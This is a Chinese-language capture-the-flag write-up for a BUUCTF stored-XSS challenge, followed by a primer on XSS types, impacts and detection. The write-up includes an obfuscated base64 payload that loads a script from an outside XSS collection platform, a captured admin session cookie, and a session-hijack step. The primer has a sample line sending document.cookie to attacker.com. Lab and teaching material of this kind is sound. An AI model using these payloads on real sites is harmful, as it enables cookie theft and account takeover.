1.【BUUCTF】BUU XSS COURSE 11及XSS知识点

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目
XSS安全平台

在平台创建项目

下一步时选择这个,再滑到最下面点击下一步就创建成功了

在跳转的页面在给出了很多语句,选择其中一个复制

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvM2c3Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

在吐槽处粘贴,并提交,提示成功

访问它所给的url,因为靶机过期了,这里更换了靶机所以url不一样哈

在xss平台查看cookie值,接收到了两个内容,其中第二个是管理员内容,查看cookie值

获取到了 cookie :

PHPSESSID=b699f6cfc0171e76519d53e0cdde912f

访问后台路径

http://web/backend/admin.php

根据提示构造url并访问

http://6d8981fb-8b3b-41f5-8332-1acf3cd56aff.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中抓包,修改cookie值并放行

点击放行,最终得到flag


XSS知识点

跨站脚本攻击(简称 XSS)是一种常见的 Web 安全漏洞,可以通过注入恶意脚本到网页中,当用户访问该页面时,脚本会在用户的浏览器中执行,从而获取用户的敏感信息或执行其他恶意操作。

XSS 攻击类型

反射型 XSS

原理:攻击者构造包含恶意脚本的 URL,诱导用户点击。服务器接收到请求后,将恶意脚本作为响应的一部分返回给浏览器,浏览器会执行该脚本。

示例:搜索页面中,如果搜索关键词直接显示在页面上,攻击者可以构造包含恶意脚本的搜索关键词,如 <script>alert('XSS')</script>,当用户点击包含该关键词的链接时,服务器返回的页面会执行该脚本弹出提示框。

存储型 XSS

原理:攻击者将恶意脚本提交到网站的数据库中,当其他用户访问包含该恶意脚本的页面时,浏览器会执行该脚本。

示例:在论坛的留言板中,攻击者提交一条包含恶意脚本的留言,如 <script>document.location='http://attacker.com?cookie='+document.cookie\</script>。当其他用户查看该留言时,脚本会将用户的 cookie 信息发送到攻击者的服务器。

DOM 型XSS

原理:基于 DOM(文档对象模型)的 XSS 攻击不依赖于服务器端的响应,而是通过修改页面的 DOM 结构来注入恶意脚本。攻击者通过构造特定的 URL 或表单数据,使浏览器在处理页面时动态地将恶意脚本插入到 DOM 中并执行。

示例:页面中有一个 JavaScript 代码根据 URL 参数修改页面内容,如 document.getElementById('content').innerHTML = location.hash.substr(1);,攻击者可以构造包含恶意脚本的 URL,如 http://example.com/#\<script>alert('XSS')</script>,当用户访问该 URL 时,浏览器会执行脚本。

XSS 攻击危害

窃取用户信息:攻击者可以通过 XSS 脚本获取用户的 cookie、会话令牌等敏感信息,从而假冒用户身份登录网站,进行各种操作。

篡改页面内容:攻击者可以修改页面的显示内容,误导用户,如修改登录表单的提交地址,将用户输入的账号密码发送到攻击者的服务器。

执行恶意操作:在用户的浏览器中执行恶意代码,如安装恶意软件、发起 DDoS 攻击等。

XSS 攻击的注入点

URL 参数:很多 Web 应用会根据 URL 参数动态生成页面内容,攻击者可以在 URL 参数中注入恶意脚本。

表单输入:用户在表单中输入的内容如果没有经过严格过滤和验证,可能会被作为恶意脚本注入到页面中。

HTTP 头部:某些情况下,HTTP 头部信息也可能被用于 XSS 攻击,如 Referer 头部。

检测 XSS 漏洞

手动测试:通过构造包含常见 XSS 测试代码的输入,如 <script>alert('XSS')</script>、<img src=x onerror=alert('XSS')> 等,观察页面是否执行了这些脚本。

自动化工具:使用专业的安全扫描工具,如 OWASP ZAP、Nessus 等,对网站进行全面扫描,检测是否存在 XSS 漏洞。

相关推荐
用户962377954483 分钟前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机3 小时前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机3 小时前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954485 小时前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star5 小时前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954488 小时前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher2 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行5 天前
网络安全总结
安全·web安全
DianSan_ERP5 天前
电商API接口全链路监控:构建坚不可摧的线上运维防线
大数据·运维·网络·人工智能·git·servlet
red1giant_star5 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全